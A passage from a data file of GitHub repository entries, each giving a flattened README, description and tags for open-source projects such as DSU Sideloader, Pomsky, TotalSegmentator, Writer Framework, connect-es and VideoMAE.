software.;rust,security,reliability,systems-programming,book
tnballo/high-assurance-rust
VegaBobo/DSU-Sideloader;DSU Sideloader A simple app made to help users easily install GSIs via DSU's Android feature. Requirements Android 10 or higher Unlocked Bootloader Device with Dynamic Partitions A GSI you want to use! Community GSIs: https://github.com/phhusson/treble_experimentations/wiki/Generic-System-Image-%28GSI%29-list Google GSIs: https://developer.android.com/topic/generic-system-image/releases * Remember to use GSIs compatible with your architeture, vndk implementation.. Downloads Or download the latest APK from the Releases Section . For testing builds, you can check artifacts at Actions tab How to use? Install app When opening for the first time, you need to give read/write permission to a folder, create a new folder and allow access * this folder will be used to store temporary files, like extracted GSIs from compressed files) Select a GSI to install **accepted formats are: gz, xz, img and zip (only DSU packages) You can customize installation as you want like changing userdata size for dynamic system* changing gsi file size is not recommended (let app do it automatically)* Tap on "Install" Wait until finishes! (it may take a some time) Once it finishes, next step may vary: If built-in installer is enabled, no extra step is required. When built-in installer is disabled, on rooted/system/shizuku operation mode, DSU screen will appear, prompting you to confirm installation, after that, check your notifications, DSU should start installing GSI. On ADB operation mode, you will be prompted to run a command in adb, once you run, DSU screen will appear asking you to confirm installation, after that, DSU should start installing GSI. Once dynamic system is ready, you can boot it through notifications, or, if operation mode is supported, directly from our app. For more usage information, you can check Operation modes Operation modes DSU Sideloader support multiple operation modes, they will define how our app will work, also, the operation mode is obtained automatically, and by now, is impossible to change it manually, the picked operation mode will be the best available (the priority is written below, in which, the most feature supported, is the highest number, and the most basic one is the lowest). ADB: Default operation mode when other modes aren't available Only prepare selected image to be installed via DSU system-app Requires adb command to start installation (which will invoke DSU system-app to install the prepared file) Shizuku: When running app with Shizuku (Obtained when Shizuku permission is granted) Same as ADB, however, it does not require to run any adb command Support tracking installation progress ¹ ² ³ Support installation diagnostics (if a common error is detected, it may give you useful information) ¹ ³ Root: When running app with root permissions (Obtained when user grant root permission) All features avaiable in Shizuku, however, does not require any special permissions DynamicSystem API features (check if DSU is installed, reboot to DSU, discard..., everthing directly from app) Support built-in DSU installer ⁴ ⁵ System mode: When running as system-app (Obtained by installing our Magisk module) All features avaiable in Shizuku Fixes for some common gsi/dsu-related SELinux denials Custom gsid binary (can fix some installation errors in some devices ⁵ ⁶ System/Root mode: When running as system-app with granted root permission (Obtained by installing our Magisk module and granting root permission) All features available in root and system operation mode ¹ Requires READ_LOGS permission. ² Partital support on Android 10 and 11. ³ Android 13 requires "One-time log access". ⁴ Feature not supported on Android 10. ⁵ Experimental feature, built-in installer code is here . ⁶ Module including custom gsid binary is optional, changes made to AOSP gsid binary can be found here . Recomendations For non-rooted devices, Shizuku is a pretty nice operation mode, it support most features with no hassle, however, you need to install and setup Shizuku app in your device. For rooted devices, Root operation mode is more than ok for most people. If you're having issues with DSU feature, go with System/Root. Rooted devices via Magisk, should be running Magisk v24 or higher, older versions may break DSU feature. We highly recommend using this app with Stock ROM, some Custom ROM builds may also work fine. Common questions DSU installation finishes with no errors, but device doesn't boot into installed DSU, what should i do? It is likely that AVB is preventing device from booting installed images, try flashing disabled vbmeta, check this for more info. Why isn't possible to set a high userdata value? The more storage you have free, the more you can use to be your userdata, some Android versions limit the maximum allowed for allocation (this limitation is 40%, and is not our app limitation, it is a thing from Android itself, you can use our custom gsid binary, which reduces this limitation to 20%, is possible to eliminate it, but no clue if there is some implications, so, i just decided to decrease it). Why "Unmount SD" option exists? If available, DSU priorizes allocation in sdcard, but allocating in sdcard is not supported in some cases (it may depends on filesystem present on sd, and if the allocation in SD is allowed by OS itself), since allocating in SD may cause installation errors in some devices, that options is here to enforce allocation in device storage. Why built-in installer requires root? Because it uses Android's internal DynamicSystem API, which requires "MANAGE_DYNAMIC_SYSTEM", which is a signature protection level, the convenient way to circumvent it, is by using root. shell (2000) has "INSTALL_DYNAMIC_SYSTEM", which is able to call DSU system-app (this one has "MANAGE_DYNAMIC_SYSTEM") to install images. How about updates? Our app comes with a updater, you can check updates in "About" section. Other question? problem? Feel free to start a issue, for troubleshooting, don't forget to send logs (logs can be obtained on installation phase, directly on app, when operation mode support installation diagnostics). About DSU DSU (Dynamic System Updates), is a feature introduced on Android 10, that let developers boot GSIs without touching current system partition, this is done by creating new partitions to hold a GSI and a separated userdata, to boot on them when desired. Unfortunelly, DSU depends on Dynamic Partitions (your device need to support, otherwise, won't work), and most GSIs requires unlocked bootloader to get them booting properly (since only OEM-Signed GSIs are allowed to boot on locked bootloader). GSIs can be installed via DSU without root access, using ADB, running some commands, you can read more about installation process here: https://developer.android.com/topic/dsu Once installation finishes, Android creates a persistent notification allowing you to boot into "Dynamic System" (GSI installed via DSU), and you can boot into installed GSI, without touching your system partition, or breaking the "real userdata" partition. After booting Dynamic System, you can try and test whatever you want, when you need to switch back to device's original system image, everything you need to do, is just, a simple reboot! When doing a long test, that may requires lots of reboots, this can be a pain, however, is possible to enable "sticky mode", that enforces dynamic system, instead of device's original system image, once tests are done, you can disable sticky mode and return to original system image. That is basically a quickly explanation about DSU, a amazing feature, like a "dual-boot" solution, limited, however, very safe (since no read-only partition will be modified, and if GSI does not boot, just a simple reboot will return you to the original device's system image). You can read more about DSU here: https://source.android.com/devices/tech/ota/dynamic-system-updates How to enable Sticky Mode? Reboot to Dynamic System, and: - use this command on adb: adb shell gsi_tool enable - or from local adb shell: gsi_tool enable - or from local rooted shell (eg. Termux on rooted GSI): su -c 'gsi_tool enable' When sticky mode is enabled, device will always boot into dynamic system, instead of device's original system image. To disable, use the same command, instead of enable , use disable Other For translators, we now have a Crowdin, feel free send your translations: https://crowdin.com/translate/dsu-sideloader/ App icon made by WSTxda;A simple app made to help users easily install GSIs via DSU's Android feature.;[]
VegaBobo/DSU-Sideloader
pomsky-lang/pomsky;![Pomsky logo](https://raw.githubusercontent.com/pomsky-lang/pomsky/main/assets/logo.svg) # Pomsky A portable 1 , modern regular expression language [![Website][web-badge]][web-link] [![Docs][doc-badge]][doc-link] [![Playground][playground-badge]][playground-link] [![VS Code plugin][vscode-badge]][vscode-link] [![Discord][discord-badge]][discord-link] [![Crates.io][crates-badge]][crates-link] Get Started To begin, check out the website . What's New Read the blog or the changelog to learn about new features. Installation Pre-built binaries can be found on the releases page . Pomsky can also be installed from source via cargo with cargo install pomsky-bin . Compatibility Pomsky is currently compatible with PCRE, JavaScript, Java, .NET, Python, Ruby and Rust. The regex flavor must be specified during compilation, so Pomsky can ensure that the produced regex works as desired on the targeted regex engine. Note : You should enable Unicode support in your regex engine, if it isn't enabled by default. This is explained here . Portability Pomsky aims to be as portable as possible, polyfilling Unicode and unsupported features where feasible. That said, there are some cases where portability is not possible: Some features (e.g. lookaround, backreferences, Unicode properties) aren't supported in every flavor. Pomsky fails to compile when you're using an unsupported feature. \b (word boundaries) are not Unicode aware in JavaScript. Pomsky therefore only allows word boundaries when Unicode is disabled. \w in .NET handles Unicode incorrectly, with no way to polyfill it properly. This means that in .NET, [word] only matches the L , Mn , Nd , and Pc general categories, instead of Alphabetic , M , Nd , Pc and Join_Control . In .NET, . , Codepoint and character classes (e.g. [Latin] ) only match a single UTF-16 code unit rather than a codepoint. [space] matches slightly different code points in JavaScript than in Java. This will be fixed. Backreferences behave differently in JavaScript and Python when the referenced group has no captured text. There is nothing we can do about it, but we could add a warning for this in the future. Security Never compile or execute an untrusted Pomsky expression on your critical infrastructure . This may make you vulnerable for denial of service attacks, like the Billion Laughs attack . Read more Diagnostics Pomsky looks for mistakes and displays helpful diagnostics: It shows an error if you use a feature not supported by the targeted regex flavor It detects syntax errors and shows suggestions on how to resolve them It parses backslash escapes (which are not allowed in a Pomsky expression) and explains what to write instead It looks for likely mistakes and displays warnings It looks for patterns that can be very slow for certain inputs and are susceptible to Denial-of-Service attacks (coming soon) Comparison with other projects I wrote an in-depth comparison with similar projects, which you can find here . Code of Conduct The Code of Conduct can be found here . Contributing You can contribute by using Pomsky and providing feedback. If you find a bug or have a question, please create an issue. I also gladly accept code contributions. More information Sponsor this project Go to my sponsors page License Dual-licensed under the MIT license or the Apache 2.0 license .;A new, portable, regular expression language;regex,regexp,regular-expression,pomsky,rust-lang
pomsky-lang/pomsky
wasserth/TotalSegmentator;TotalSegmentator Tool for segmentation of most major anatomical structures in any CT or MR image. It was trained on a wide range of different CT and MR images (different scanners, institutions, protocols,...) and therefore should work well on most images. A large part of the training dataset can be downloaded here: CT dataset (1228 subjects) and MR dataset (298 subjects). You can also try the tool online at totalsegmentator.com . ANNOUNCEMENT: We recently added support for MR images. Try out by using the task -ta total_mr or see more details in our paper . Supported classes for CT: Supported classes for MR: Created by the department of Research and Analysis at University Hospital Basel . If you use it please cite our Radiology AI paper ( free preprint ). If you use it for MR images please cite the TotalSegmentator MRI paper . Please also cite nnUNet since TotalSegmentator is heavily based on it. Installation TotalSegmentator works on Ubuntu, Mac, and Windows and on CPU and GPU. Install dependencies: * Python >= 3.9 * Pytorch >= 2.0.0 Optionally: * if you use the option --preview you have to install xvfb ( apt-get install xvfb ) and fury ( pip install fury ) Install Totalsegmentator pip install TotalSegmentator Usage For CT images: TotalSegmentator -i ct.nii.gz -o segmentations For MR images: TotalSegmentator -i mri.nii.gz -o segmentations --task total_mr Note: A Nifti file or a folder (or zip file) with all DICOM slices of one patient is allowed as input. Note: If you run on CPU use the option --fast or --roi_subset to greatly improve runtime. Note: This is not a medical device and is not intended for clinical usage. Subtasks Next to the default task ( total ) there are more subtasks with more classes. If the taskname ends with _mr is works for MR images, otherwise for CT images. Openly available for any usage: * total : default task containing 117 main classes (see here for a list of classes) * total_mr : default task containing 56 main classes on MR images (see here for a list of classes) * lung_vessels : lung_vessels (cite paper ), lung_trachea_bronchia * body : body, body_trunc, body_extremities, skin * cerebral_bleed : intracerebral_hemorrhage (cite paper ) * hip_implant : hip_implant * coronary_arteries : coronary_arteries * pleural_pericard_effusion : pleural_effusion (cite paper ), pericardial_effusion (cite paper ) *: These models are not trained on the full totalsegmentator dataset but on some small other datasets. Therefore, expect them to work less robustly. Available with a license (free licenses available for non-commercial usage here . For a commercial license contact jakob.wasserthal@usb.ch): * heartchambers_highres : myocardium, atrium_left, ventricle_left, atrium_right, ventricle_right, aorta, pulmonary_artery (trained on sub-millimeter resolution) * appendicular_bones : patella, tibia, fibula, tarsal, metatarsal, phalanges_feet, ulna, radius, carpal, metacarpal, phalanges_hand * tissue_types : subcutaneous_fat, torso_fat, skeletal_muscle * tissue_types_mr : subcutaneous_fat, torso_fat, skeletal_muscle (for MR images) * vertebrae_body : vertebral body of all vertebrae (without the vertebral arch) * face : face_region Usage: TotalSegmentator -i ct.nii.gz -o segmentations -ta <task_name> The mapping from label ID to class name can be found here . Advanced settings --device : Choose cpu or gpu or gpu:X (e.g., gpu:1 -> cuda:1) --fast : For faster runtime and less memory requirements use this option. It will run a lower resolution model (3mm instead of 1.5mm). --roi_subset : Takes a space-separated list of class names (e.g. spleen colon brain ) and only predicts those classes. Saves a lot of runtime and memory. Might be less accurate especially for small classes (e.g. prostate). --preview : This will generate a 3D rendering of all classes, giving you a quick overview if the segmentation worked and where it failed (see preview.png in output directory). --ml : This will save one nifti file containing all labels instead of one file for each class. Saves runtime during saving of nifti files. (see here for index to class name mapping). --statistics : This will generate a file statistics.json with volume (in mm³) and mean intensity of each class. --radiomics : This will generate a file statistics_radiomics.json with the radiomics features of each class. You have to install pyradiomics to use this ( pip install pyradiomics ). Run via docker We also provide a docker container which can be used the following way docker run --gpus 'device=0' --ipc=host -v /absolute/path/to/my/data/directory:/tmp wasserth/totalsegmentator:2.2.1 TotalSegmentator -i /tmp/ct.nii.gz -o /tmp/segmentations Running v1 If you want to keep on using TotalSegmentator v1 (e.g. because you do not want to change your pipeline) you can install it with the following command: pip install TotalSegmentator==1.5.7 The documentation for v1 can be found here . Bugfixes for v1 are developed in the branch v1_bugfixes . Our Radiology AI publication refers to TotalSegmentator v1. Resource Requirements Totalsegmentator has the following runtime and memory requirements (using an Nvidia RTX 3090 GPU): (1.5mm is the normal model and 3mm is the --fast model. With v2 the runtimes have increased a bit since we added more classes.) If you want to reduce memory consumption you can use the following options: * --fast : This will use a lower-resolution model * --body_seg : This will crop the image to the body region before processing it * --roi_subset <list of classes> : This will only predict a subset of classes * --force_split : This will split the image into 3 parts and process them one after another. (Do not use this for small images. Splitting these into even smaller images will result in a field of view which is too small.) * --nr_thr_saving 1 : Saving big images with several threads will take a lot of memory Train/validation/test split The exact split of the dataset can be found in the file meta.csv inside of the dataset . This was used for the validation in our paper. The exact numbers of the results for the high-resolution model (1.5mm) can be found here . The paper shows these numbers in the supplementary materials Figure 11. Retrain model and run evaluation See here for more info on how to train a nnU-Net yourself on the TotalSegmentator dataset, how to split the data into train/validation/test set as in our paper, and how to run the same evaluation as in our paper. Python API You can run totalsegmentator via Python: ```python import nibabel as nib from totalsegmentator.python_api import totalsegmentator if name == " main ": # option 1: provide input and output as file paths totalsegmentator(input_path, output_path) # option 2: provide input and output as nifti image objects input_img = nib.load(input_path) output_img = totalsegmentator(input_img) nib.save(output_img, output_path) ``` You can see all available arguments here . Running from within the main environment should avoid some multiprocessing issues. The segmentation image contains the names of the classes in the extended header. If you want to load this additional header information you can use the following code: ```python from totalsegmentator.nifti_ext_header import load_multilabel_nifti segmentation_nifti_img, label_map_dict = load_multilabel_nifti(image_path) `` The above code requires pip install xmltodict`. Install latest master branch (contains latest bug fixes) pip install git+https://github.com/wasserth/TotalSegmentator.git Other commands If you want to combine some subclasses (e.g. lung lobes) into one binary mask (e.g. entire lung) you can use the following command: totalseg_combine_masks -i totalsegmentator_output_dir -o combined_mask.nii.gz -m lungcomm Normally weights are automatically downloaded when running TotalSegmentator. If you want to download the weights with an extra command (e.g. when building a docker container) use this: totalseg_download_weights -t <task_name> After acquiring a license number for the non-open tasks you can set it with the following command: totalseg_set_license -l aca_12345678910 Typical problems ITK loading Error When you get the following error message ITK ERROR: ITK only supports orthonormal direction cosines. No orthonormal definition was found! you should do pip install SimpleITK==2.0.2 Alternatively you can try fslorient -copysform2qform input_file fslreorient2std input_file output_file Bad segmentations When you get bad segmentation results check the following: * does your input image contain the original HU values or are the intensity values rescaled to a different range? * is the patient normally positioned in the image? (In axial view is the spine at the bottom of the image? In the coronal view is the head at the top of the image?) Other TotalSegmentator sends anonymous usage statistics to help us improve it further. You can deactivate it by setting send_usage_stats to false in ~/.totalsegmentator/config.json . At changes and improvements you can see any overview of differences between v1 and v2. Reference For more details see our Radiology AI paper ( freely available preprint ). If you use this tool please cite it as follows Wasserthal, J., Breit, H.-C., Meyer, M.T., Pradella, M., Hinck, D., Sauter, A.W., Heye, T., Boll, D., Cyriac, J., Yang, S., Bach, M., Segeroth, M., 2023. TotalSegmentator: Robust Segmentation of 104 Anatomic Structures in CT Images. Radiology: Artificial Intelligence. https://doi.org/10.1148/ryai.230024 Please also cite nnUNet since TotalSegmentator is heavily based on it. Moreover, we would really appreciate it if you let us know what you are using this tool for. You can also tell us what classes we should add in future releases. You can do so here . Class details The following table shows a list of all classes for task total . TA2 is a standardized way to name anatomy. Mostly the TotalSegmentator names follow this standard. For some classes they differ which you can see in the table below. Here you can find a mapping of the TotalSegmentator classes to SNOMED-CT codes. |Index|TotalSegmentator name|TA2 name| |:-----|:-----|:-----| 1 | spleen || 2 | kidney_right || 3 | kidney_left || 4 | gallbladder || 5 | liver || 6 | stomach || 7 | pancreas || 8 | adrenal_gland_right | suprarenal gland | 9 | adrenal_gland_left | suprarenal gland | 10 | lung_upper_lobe_left | superior lobe of left lung | 11 | lung_lower_lobe_left | inferior lobe of left lung | 12 | lung_upper_lobe_right | superior lobe of right lung | 13 | lung_middle_lobe_right | middle lobe of right lung | 14 | lung_lower_lobe_right | inferior lobe of right lung | 15 | esophagus || 16 | trachea || 17 | thyroid_gland || 18 | small_bowel | small intestine | 19 | duodenum || 20 | colon || 21 | urinary_bladder || 22 | prostate || 23 | kidney_cyst_left || 24 | kidney_cyst_right || 25 | sacrum || 26 | vertebrae_S1 || 27 | vertebrae_L5 || 28 | vertebrae_L4 || 29 | vertebrae_L3 || 30 | vertebrae_L2 || 31 | vertebrae_L1 || 32 | vertebrae_T12 || 33 | vertebrae_T11 || 34 | vertebrae_T10 || 35 | vertebrae_T9 || 36 | vertebrae_T8 || 37 | vertebrae_T7 || 38 | vertebrae_T6 || 39 | vertebrae_T5 || 40 | vertebrae_T4 || 41 | vertebrae_T3 || 42 | vertebrae_T2 || 43 | vertebrae_T1 || 44 | vertebrae_C7 || 45 | vertebrae_C6 || 46 | vertebrae_C5 || 47 | vertebrae_C4 || 48 | vertebrae_C3 || 49 | vertebrae_C2 || 50 | vertebrae_C1 || 51 | heart || 52 | aorta || 53 | pulmonary_vein || 54 | brachiocephalic_trunk || 55 | subclavian_artery_right || 56 | subclavian_artery_left || 57 | common_carotid_artery_right || 58 | common_carotid_artery_left || 59 | brachiocephalic_vein_left ||suprarenal gland 60 | brachiocephalic_vein_right || 61 | atrial_appendage_left || 62 | superior_vena_cava || 63 | inferior_vena_cava || 64 | portal_vein_and_splenic_vein | hepatic portal vein | 65 | iliac_artery_left | common iliac artery | 66 | iliac_artery_right | common iliac artery | 67 | iliac_vena_left | common iliac vein | 68 | iliac_vena_right | common iliac vein | 69 | humerus_left || 70 | humerus_right || 71 | scapula_left || 72 | scapula_right || 73 | clavicula_left | clavicle | 74 | clavicula_right | clavicle | 75 | femur_left || 76 | femur_right || 77 | hip_left || 78 | hip_right || 79 | spinal_cord || 80 | gluteus_maximus_left | gluteus maximus muscle | 81 | gluteus_maximus_right | gluteus maximus muscle | 82 | gluteus_medius_left | gluteus medius muscle | 83 | gluteus_medius_right | gluteus medius muscle | 84 | gluteus_minimus_left | gluteus minimus muscle | 85 | gluteus_minimus_right | gluteus minimus muscle | 86 | autochthon_left || 87 | autochthon_right || 88 | iliopsoas_left | iliopsoas muscle | 89 | iliopsoas_right | iliopsoas muscle | 90 | brain || 91 | skull || 92 | rib_left_1 || 93 | rib_left_2 || 94 | rib_left_3 || 95 | rib_left_4 || 96 | rib_left_5 || 97 | rib_left_6 || 98 | rib_left_7 || 99 | rib_left_8 || 100 | rib_left_9 || 101 | rib_left_10 || 102 | rib_left_11 || 103 | rib_left_12 || 104 | rib_right_1 || 105 | rib_right_2 || 106 | rib_right_3 || 107 | rib_right_4 || 108 | rib_right_5 || 109 | rib_right_6 || 110 | rib_right_7 || 111 | rib_right_8 || 112 | rib_right_9 || 113 | rib_right_10 || 114 | rib_right_11 || 115 | rib_right_12 || 116 | sternum || 117 | costal_cartilages || Class map for task total_mr : |Index|TotalSegmentator name|TA2 name| |:-----|:-----|:-----| 1 | spleen || 2 | kidney_right || 3 | kidney_left || 4 | gallbladder || 5 | liver || 6 | stomach || 7 | pancreas || 8 | adrenal_gland_right | suprarenal gland | 9 | adrenal_gland_left | suprarenal gland | 10 | lung_left || 11 | lung_right || 12 | esophagus || 13 | small_bowel | small intestine | 14 | duodenum || 15 | colon || 16 | urinary_bladder || 17 | prostate || 18 | sacrum || 19 | vertebrae || 20 | intervertebral_discs || 21 | spinal_cord || 22 | heart || 23 | aorta || 24 | inferior_vena_cava || 25 | portal_vein_and_splenic_vein | hepatic portal vein | 26 | iliac_artery_left | common iliac artery | 27 | iliac_artery_right | common iliac artery | 28 | iliac_vena_left | common iliac vein | 29 | iliac_vena_right | common iliac vein | 30 | humerus_left || 31 | humerus_right || 32 | fibula || 33 | tibia || 34 | femur_left || 35 | femur_right || 36 | hip_left || 37 | hip_right || 38 | gluteus_maximus_left | gluteus maximus muscle | 39 | gluteus_maximus_right | gluteus maximus muscle | 40 | gluteus_medius_left | gluteus medius muscle | 41 | gluteus_medius_right | gluteus medius muscle | 42 | gluteus_minimus_left | gluteus minimus muscle | 43 | gluteus_minimus_right | gluteus minimus muscle | 44 | autochthon_left || 45 | autochthon_right || 46 | iliopsoas_left | iliopsoas muscle | 47 | iliopsoas_right | iliopsoas muscle | 48 | quadriceps_femoris_left || 49 | quadriceps_femoris_right || 50 | thigh_medial_compartment_left || 51 | thigh_medial_compartment_right || 52 | thigh_posterior_compartment_left || 53 | thigh_posterior_compartment_right || 54 | sartorius_left || 55 | sartorius_right || 56 | brain ||;Tool for robust segmentation of >100 important anatomical structures in CT and MR images;[]
wasserth/TotalSegmentator
writer/writer-framework;What is Framework? Writer Framework is an open-source framework for creating AI applications. Build user interfaces using a visual editor; write the backend code in Python. Writer Framework is fast and flexible with a clean, easily-testable syntax. It provides separation of concerns between UI and business logic, enabling more complex applications. Highlights Reactive and state-driven Writer Framework is fully state-driven and provides separation of concerns between user interface and business logic. ```py import writer as wf def handle_increment(state): state["counter"] += 1 wf.init_state({ "counter": 0 }) ``` The user interface is a template, which is defined visually. The template contains reactive references to state, e.g. @{counter} , and references to event handlers, e.g. when Button is clicked, trigger handle_increment . Flexible Elements are highly customizable with no CSS required, allowing for shadows, button icons, background colors, etc. HTML elements with custom CSS can be included using the HTML Element component. They can serve as containers for built-in components. Fast Event handling adds minimal overhead to your Python code (~1-2ms*). Streaming (WebSockets) is used to synchronize frontend and backend states. The script only runs once. Non-blocking by default. Events are handled asynchronously in a thread pool running in a dedicated process. *End-to-end figure, including DOM mutation. Tested locally on a Macbook Air M2. Measurement methodology . Developer-friendly It's all contained in a standard Python package, just one pip install away. User interfaces are saved as JSON, so they can be version controlled together with the rest of the application. Use your local code editor and get instant refreshes when you save your code. Alternatively, use the provided web-based editor. You edit the UI while your app is running. No hitting "Preview" and seeing something completely different to what you expected. Installation and Quickstart Getting started with Writer Framework is easy. It works on Linux, Mac and Windows. sh pip install writer writer hello The first command will install Writer Framework using pip . The second command will create a demo application in the subfolder "hello" and start Writer Framework Builder, the framework's visual editor, which will be accessible via a local URL. The following commands can be used to create, launch Writer Framework Builder and run an application. sh writer create my_app writer edit my_app writer run my_app Documentation Full documentation, including how to use Writer's AI module and deployment options, is available at Writer . About Writer Writer is the full-stack generative AI platform for enterprises. Quickly and easily build and deploy generative AI apps with a suite of developer tools fully integrated with our platform of LLMs, graph-based RAG tools, AI guardrails, and more. Learn more at writer.com . License This project is licensed under the Apache 2.0 License.;No-code in the front, Python in the back. An open-source framework for creating data apps.;data-apps,data-visualization,python,websockets,no-code,developer-tools,interface,interface-builder,models,ui
writer/writer-framework
reactwg/react-native-new-architecture;React Native New Architecture Working Group The intention of this repository is to coordinate and support the rollout of the React Native New Architecture . We have provided guides and a discussion space for this purpose. You can find New Architecture updates here . Guides How to enable the New Architecture For Apps Enable the New Architecture for Apps For Libraries Make your library compatible with the New Architecture Convert Library to TurboModules/Fabric APIs Additional information for Android Additional information for iOS New Architecture Workflows Create a Fabric Native Component Create a Turbo Native Module Using Codegen to write type-safe Fabric Components and Turbo Modules Writing cross-platform TurboModules with C++ Supporting custom C++ types Using React 18 features Backwards compatibility For Legacy Native Modules For Legacy Native Components Troubleshooting Appendix Discussion This repository is also a place for discussion and feedback on the New Architecture. You can access it by heading over to the Discussions Tab on Github . Sections We've created some sections to keep the discussion focused. | Title | Topic | | ----------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------- | | Announcements 📣 | General announcements about this working group. | | Deep Dive 🐳 | Sharing deep dives and technical-specific topics | | Documentation 📚 | A place to chat about the New Architecture documentation and migration material | | Libraries 🛠 | A place to chat about 3rd party libraries and their migration story to the New Architecture | | Q&A 🤝 | A place to ask the community for help on the New Architecture topics | | Releases 🏁 | Updates on New Architecture in each release |;Workgroup for the New React Native Architecture;react-native,fabric,turbomodule,working-group
reactwg/react-native-new-architecture
connectrpc/connect-es;Connect for ECMAScript Connect is a family of libraries for building type-safe APIs with different languages and platforms. @connectrpc/connect brings them to TypeScript, the web browser, and to Node.js. With Connect, you define your schema first: service ElizaService { rpc Say(SayRequest) returns (SayResponse) {} } And with the magic of code generation, this schema produces servers and clients: ts const answer = await eliza.say({sentence: "I feel happy."}); console.log(answer); // {sentence: 'When you feel happy, what do you do?'} Unlike REST, the Remote Procedure Call are type-safe, but they are regular HTTP under the hood. You can see all requests in the network inspector, and you can curl them if you want: shell curl \ --header 'Content-Type: application/json' \ --data '{"sentence": "I feel happy."}' \ https://demo.connectrpc.com/connectrpc.eliza.v1.ElizaService/Say Connect uses Protobuf-ES , the only fully-compliant Protobuf JavaScript library. Connect implements RPC three protocols: The widely available gRPC and gRPC-web protocols, and Connect's own protocol , optimized for the web. This gives you unparalleled interoperability across many platforms and languages, with type-safety end-to-end. Get started on the web Follow our 10 minute tutorial where we use Vite and React to create a web interface for ELIZA. React , Svelte , Vue , Next.js and Angular are supported (see examples ), and we have an expansion pack for TanStack Query . We support all modern web browsers that implement the widely available fetch API and the Encoding API . Get started on Node.js Follow our 10 minute tutorial to spin up a service in Node.js, and call it from the web, and from a gRPC client in your terminal. You can serve your Connect RPCs with vanilla Node.js, or use our server plugins for Fastify , Next.js , and Express . We support Node.js v16 and later with the builtin http and http2 modules. Other platforms Would you like to use Connect on other platforms like Bun, Deno, Vercel’s Edge Runtime, or Cloudflare Workers? We’d love to learn about your use cases and what you’d like to do with Connect. You can reach us either through the Buf Slack or by filing a GitHub issue and we’d be more than happy to chat! Packages @connectrpc/connect : RPC clients and servers for your schema ( source code ). @connectrpc/protoc-gen-connect-es : Code generator plugin for the services in your schema ( source code ). @connectrpc/connect-web : Adapters for web browsers, and any other platform that has the fetch API on board. @connectrpc/connect-node : Serve RPCs on vanilla Node.js servers. Call RPCs with any protocol. @connectrpc/connect-fastify : Plug your services into a Fastify server. @connectrpc/connect-next : Serve your RPCs with Next.js API routes. @connectrpc/connect-express : Adds your services to an Express server. The libraries and the generated code are compatible with ES2017 and TypeScript 4.1. Ecosystem examples-es : Examples for using Connect with various TypeScript web frameworks and tooling connect-query-es : TypeScript-first expansion pack for TanStack Query that gives you Protobuf superpowers connect-playwright-es : Playwright tests for your Connect application connect-swift : Idiomatic gRPC & Connect RPCs for Swift connect-go : Go implementation of gRPC, gRPC-Web, and Connect examples-go : Example RPC service powering https://demo.connectrpc.com and built with connect-go conformance : gRPC-Web and Connect interoperability tests Buf Studio : web UI for ad-hoc RPCs Status: Stable All packages are stable and have reached a major version release. Legal Offered under the Apache 2 license .;The TypeScript implementation of Connect: Protobuf RPC that works.;grpc-web,protobuf,typescript,grpc,rpc,nodejs,javascript,protoc-plugin,schema,fastify-plugin
connectrpc/connect-es
MCG-NJU/VideoMAE;Official PyTorch Implementation of VideoMAE (NeurIPS 2022 Spotlight). VideoMAE: Masked Autoencoders are Data-Efficient Learners for Self-Supervised Video Pre-Training Zhan Tong , Yibing Song , Jue Wang , Limin Wang Nanjing University, Tencent AI Lab 📰 News [2023.4.18] 🎈Everyone can download Kinetics-400 , which is used in VideoMAE, from this link . [2023.4.18] Code and pre-trained models of VideoMAE V2 have been released! Check and enjoy this repo ! [2023.4.17] We propose EVAD , an end-to-end Video Action Detection framework. [2023.2.28] Our VideoMAE V2 is accepted by CVPR 2023 ! 🎉 [2023.1.16] Code and pre-trained models for Action Detection in VideoMAE are available ! [2022.12.27] 🎈Everyone can download extracted VideoMAE features of THUMOS , ActivityNet , HACS and FineAction from InternVideo . [2022.11.20] 👀 VideoMAE is integrated into and , supported by @Sayak Paul . [2022.10.25] 👀 VideoMAE is integrated into MMAction2 , the results on Kinetics-400 can be reproduced successfully. [2022.10.20] The pre-trained models and scripts of ViT-S and ViT-H are available! [2022.10.19] The pre-trained models and scripts on UCF101 are available ! [2022.9.15] VideoMAE is accepted by NeurIPS 2022 as a spotlight presentation! 🎉 [2022.8.8] 👀 VideoMAE is integrated into official 🤗HuggingFace Transformers now! [2022.7.7] We have updated new results on downstream AVA 2.2 benchmark. Please refer to our paper for details. [2022.4.24] Code and pre-trained models are available now! [2022.3.24] ~~Code and pre-trained models will be released here.~~ Welcome to watch this repository for the latest updates. ✨ Highlights 🔥 Masked Video Modeling for Video Pre-Training VideoMAE performs the task of masked video modeling for video pre-training. We propose the extremely high masking ratio (90%-95%) and tube masking strategy to create a challenging task for self-supervised video pre-training. ⚡️ A Simple, Efficient and Strong Baseline in SSVP VideoMAE uses the simple masked autoencoder and plain ViT backbone to perform video self-supervised learning. Due to the extremely high masking ratio, the pre-training time of VideoMAE is much shorter than contrastive learning methods ( 3.2x speedup). VideoMAE can serve as a simple but strong baseline for future research in self-supervised video pre-training. 😮 High performance, but NO extra data required VideoMAE works well for video datasets of different scales and can achieve 87.4% on Kinects-400, 75.4% on Something-Something V2, 91.3% on UCF101, and 62.6% on HMDB51. To our best knowledge, VideoMAE is the first to achieve the state-of-the-art performance on these four popular benchmarks with the vanilla ViT backbones while doesn't need any extra data or pre-trained models. 🚀 Main Results ✨ Something-Something V2 | Method | Extra Data | Backbone | Resolution | #Frames x Clips x Crops | Top-1 | Top-5 | | :------: | :--------: | :------: | :--------: | :---------------------: | :---: | :---: | | VideoMAE | no | ViT-S | 224x224 | 16x2x3 | 66.8 | 90.3 | | VideoMAE | no | ViT-B | 224x224 | 16x2x3 | 70.8 | 92.4 | | VideoMAE | no | ViT-L | 224x224 | 16x2x3 | 74.3 | 94.6 | | VideoMAE | no | ViT-L | 224x224 | 32x1x3 | 75.4 | 95.2 | ✨ Kinetics-400 | Method | Extra Data | Backbone | Resolution | #Frames x Clips x Crops | Top-1 | Top-5 | | :------: | :--------: | :------: | :--------: | :---------------------: | :---: | :---: | | VideoMAE | no | ViT-S | 224x224 | 16x5x3 | 79.0 | 93.8 | | VideoMAE | no | ViT-B | 224x224 | 16x5x3 | 81.5 | 95.1 | | VideoMAE | no | ViT-L | 224x224 | 16x5x3 | 85.2 | 96.8 | | VideoMAE | no | ViT-H | 224x224 | 16x5x3 | 86.6 | 97.1 | | VideoMAE | no | ViT-L | 320x320 | 32x4x3 | 86.1 | 97.3 | | VideoMAE | no | ViT-H | 320x320 | 32x4x3 | 87.4 | 97.6 | ✨ 